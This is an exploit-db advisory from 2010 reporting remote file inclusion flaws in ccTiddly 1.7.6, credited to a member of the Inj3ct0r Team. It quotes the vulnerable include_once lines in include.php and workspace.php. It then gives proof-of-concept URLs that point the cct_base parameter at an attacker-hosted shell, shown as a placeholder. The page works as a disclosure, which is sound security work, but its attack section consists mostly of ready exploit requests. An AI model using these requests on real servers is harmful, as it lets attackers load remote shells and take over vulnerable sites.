ccTiddly 1.7.6 – Multiple Remote File Inclusions

  • 作者: eidelweiss
    日期: 2010-08-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14560/
  •  1########################################1
     0I'm eidelweiss member from Inj3ct0r Team1
     1########################################0
     0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
    
    
    Developer: http://tiddlywiki.org/wiki/CcTiddlyDeveloper
    Download: http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.6.zip
    Author: eidelweiss
    Contact: g1xsystem[at]windowslive.com
    Original Advisories: http://eidelweiss-advisories.blogspot.com/2010/08/cctiddly-v176-multiple-remote-file.html
    
    ================================================================
    
    ccTiddly is a collaborative server side version of TiddlyWiki.
    
    Note:
    This is the same vuln in other lower version (http://www.exploit-db.com/exploits/7336/)
    Vendor Not Fix the vulnerability in all folder !!!
    
    ================================================================
    
    	-=[Vuln C0de]=-
    
    [!] path/includes/include.php
    
    	include_once($cct_base."includes/ccAssignments.php");
    
    [!] path/includes/workspace.php
    
    	include_once($cct_base."includes/header.php");
    	include_once($cct_base."includes/user.php");
    	include_once($cct_base."includes/tiddler.php");
    
    ================================================================
    
    	-=[P0C]=-
    
    	http://127.0.0.1/path/includes/include.php?cct_base= [inj3ct0r sh3ll]
    
    	http://127.0.0.1/path/includes/workspace.php?cct_base= [inj3ct0r sh3ll]
    
    
    =========================| -=[ E0F ]=- |============================